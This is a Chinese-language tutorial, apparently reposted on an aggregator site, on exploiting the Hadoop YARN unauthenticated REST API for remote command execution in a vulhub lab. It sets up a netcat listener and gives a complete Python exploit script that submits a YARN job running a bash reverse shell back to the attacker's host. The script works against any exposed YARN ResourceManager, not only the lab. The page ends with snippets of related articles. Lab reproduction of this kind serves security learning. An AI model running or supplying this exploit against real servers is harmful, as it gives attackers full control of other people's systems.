数据库安全:Hadoop 未授权访问-命令执行漏洞.

这篇具有很好参考价值的文章主要介绍了数据库安全:Hadoop 未授权访问-命令执行漏洞.。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

Hadoop 未授权访问-命令执行漏洞测试:


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

 第一步:切换到 vulhub 目录下

cd vulhub

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第二步:切换到 hadoop 目录下

cd hadoop

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第三步:切换到 unauthorized-yarn 漏洞目录下.

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第四步:开启 漏洞 服务.

docker-compose up -d

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第五步:访问  http:// (靶场 IP 地址):8088

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


   

Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第二步:在 攻击机(kali)设置监听.

nc -nvlp 8888

// 设置 监听 端口为8888

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第三步:编写 Python 执行代码.

import requests

def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 执行完成!")


if __name__ == '__main__':
    url = input("目标的URL:")
    vps_ip = input("监听的主机IP地址(kali):")
    port = input("监听的主机端口(kali):")
    shell(url,vps_ip,port)

执行代码:

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


第四步:返回 监听的主机查看结果,发现已经成功.

hadoop 漏洞,# 服务攻防 领域.,渗透测试 领域.,web安全,安全,网络安全


    

     

     

参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili文章来源地址https://www.toymoban.com/news/detail-751660.html

到了这里,关于数据库安全:Hadoop 未授权访问-命令执行漏洞.的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【漏洞复现】StarRocks MPP数据库未授权访问漏洞

            StarRocks 是一个MPP数据库,具备水平在线扩缩容,金融级高可用,兼容 MySQL 5.7 协议和 MySQL 生态,提供全面向量化引擎与多种数据源联邦查询等重要特性。StarRocks 致力于在全场景 OLAP 业务上为用户提供统一的解决方案,适用于对性能,实时性,并发能力和灵活性有

    2024年01月17日
    浏览(67)
  • 数据库安全控制——授权及回收权限

    任务描述 本关任务:系统用户 root 授权 user1 用户创建数据库 teachingdb2 及其所有对象的权限 相关知识 为了完成本关任务,你需要掌握 MySQL 的权限管理。 MySql系统库中的权限表 MySql 系统库中的权限表: user:最重要的权限表,存储允许连接到服务器的账号。 db:存储用户对某

    2024年02月05日
    浏览(38)
  • Docker中部署ElasticSearch 和Kibana,用脚本实现对数据库资源的未授权访问

    图未保存,不过文章当中的某一步骤可能会帮助到您,那么:感恩! 1、docker中拉取镜像 2、熟悉目录 3、启动,访问9200 4、访问测试 1、下载(同样使用docker环境) 2、启动 3、连接测试easticsearch发现失败,是前后端分离开发存在跨域问题,需要在服务端做CORS的配置 (1)进入

    2024年02月04日
    浏览(33)
  • Jupyter Notebook 未授权访问远程命令执行漏洞

    Jupyter是一个开源的交互式计算环境,它支持多种编程语言,包括Python、R、Julia等。Jupyter的名称来源于三种编程语言的缩写:Ju(lia)、Py(thon)和R。 Jupyter的主要特点是它以笔记本(Notebook)的形式组织代码、文本和多媒体内容。笔记本可以包含代码、注释、图表、公式和可运行的

    2024年02月14日
    浏览(33)
  • 基于物理安全的数据库访问控制:确保数据安全性

    作者:禅与计算机程序设计艺术 引言 1.1. 背景介绍 随着大数据时代的到来,各类组织机构和企业纷纷开始关注数据安全和隐私保护。在数据处理和存储过程中,确保数据的物理安全和逻辑安全至关重要。数据库访问控制作为保障数据安全的一项基础工作,也应受到足够的重

    2024年02月12日
    浏览(43)
  • PostgreSQL数据库命令行执行SQL脚本的三种方式

    生成环境中,出于安全性等原因,往往不提供数据库连接工具,所以对数据库的更新和升级就得通过命令行来实现。本文总结了三种命令行执行sql脚本的方式。 命令格式: psql [option…] [dbname] [username] 常用参数介绍: -h:指定IP地址或主机名。 -p:指定端口,默认为5432。 -U:

    2024年02月11日
    浏览(54)
  • Springboot使用ProcessBuilder创建系统进程执行shell命令备份数据库

    Springboot执行shell命令备份数据库。 主要就是使用ProcessBuilder创建系统进程,执行终端命令。

    2024年02月07日
    浏览(34)
  • SpringBoot 数据库高效的数据访问及安全解决方案

    作者:禅与计算机程序设计艺术 随着互联网的飞速发展,网站流量越来越多,用户数据也越来越丰富,如何有效地存储、处理和检索数据成为了一个新的技术难题。 Spring Boot 是 Spring 框架的一个轻量级开源框架,其在 JavaEE(Java Platform, Enterprise Edition)开发中扮演了重要角色

    2024年02月10日
    浏览(35)
  • Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞)

    1.1.100 = H2 Console = 2.0.204 此处复现版本1.4.197 启动项目如下 在Driver Class中输入javax.naming.InitialContext 在JDBCURL中输入jndi注入恶意链接 生成链接命令: 因为项目环境是jdk1.7,因此我们用1.7的jndi,其他版本均不生效 通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.na

    2024年02月11日
    浏览(28)
  • Python数据权限的管理通常涉及到几个关键组件:身份验证,、授权和访问控制。这通常是通过使用数据库、ORM(对象关系映射)框架、API框架和中间件

    在Python中,数据权限的管理通常涉及到几个关键组件:身份验证,、授权和访问控制。这通常是通过使用数据库、ORM(对象关系映射)框架、API框架和中间件等技术来实现的。以下是一些建议的步骤和工具,用于在Python项目中实施数据权限管理: 用户身份验证: 使用如Djan

    2024年04月26日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包